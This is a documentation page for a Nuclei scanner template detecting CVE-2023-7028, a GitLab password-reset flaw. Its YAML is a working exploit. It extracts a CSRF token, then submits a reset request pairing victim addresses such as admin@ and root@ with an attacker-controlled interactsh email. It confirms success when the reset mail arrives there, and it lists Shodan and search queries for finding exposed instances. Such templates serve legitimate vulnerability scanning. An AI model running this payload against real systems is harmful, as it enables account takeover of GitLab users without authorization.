Skip to content
Nuclei Templates

GitLab - Account Takeover via Password Reset

ID: CVE-2023-7028

Severity: high

Author: DhiyaneshDk,rootxharsh,iamnooob,pdresearch

Tags: hackerone,cve,cve2023,gitlab,auth-bypass,intrusive,kev

Description

Section titled “Description”

An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.

YAML Source

Section titled “YAML Source”
id: CVE-2023-7028


info:
  name: GitLab - Account Takeover via Password Reset
  author: DhiyaneshDk,rootxharsh,iamnooob,pdresearch
  severity: high
  description: |
    An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.
  reference:
    - https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/
    - https://x.com/rwincey/status/1745659710089437368?s=20
    - https://gitlab.com/gitlab-org/gitlab/-/issues/436084
    - https://hackerone.com/reports/2293343
    - https://github.com/V1lu0/CVE-2023-7028
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-7028
    cwe-id: CWE-640,CWE-284
    epss-score: 0.95952
    epss-percentile: 0.99464
    cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*
  metadata:
    verified: true
    max-request: 6
    vendor: gitlab
    product: gitlab
    shodan-query:
      - title:"Gitlab"
      - cpe:"cpe:2.3:a:gitlab:gitlab"
      - http.title:"gitlab"
    fofa-query: title="gitlab"
    google-query: intitle:"gitlab"
  tags: hackerone,cve,cve2023,gitlab,auth-bypass,intrusive,kev
flow: http(1) && http(2)


http:
  - raw:
      - |
        GET /users/sign_in HTTP/1.1
        Host: {{Hostname}}


    extractors:
      - type: regex
        name: token
        group: 1
        regex:
          - name="authenticity_token" value="([A-Za-z0-9_-]+)"
        internal: true


  - raw:
      - |
        @timeout: 20s
        POST /users/password HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}/users/password/new


        authenticity_token={{token}}&user[email][]={{username}}&user[email][]={{rand_base(6)}}@{{interactsh-url}}


    payloads:
      username:
        - [email protected]
        - admin@{{RDN}}
        - root@{{RDN}}
        - gitlab@{{RDN}}
        - git@{{RDN}}


    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'smtp')


    extractors:
      - type: dsl
        dsl:
          - username
# digest: 4b0a004830460221008989ca7a114182f9cd8a22e76be35a0fc8cfdfda45ad29e1eda5b5a7ecd6b0cc022100caef7ee4708b5ca4ad179d1230f7f45b071dbf6dec9a8bc47855c66bee48ecd7:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-7028.yaml"

View on Github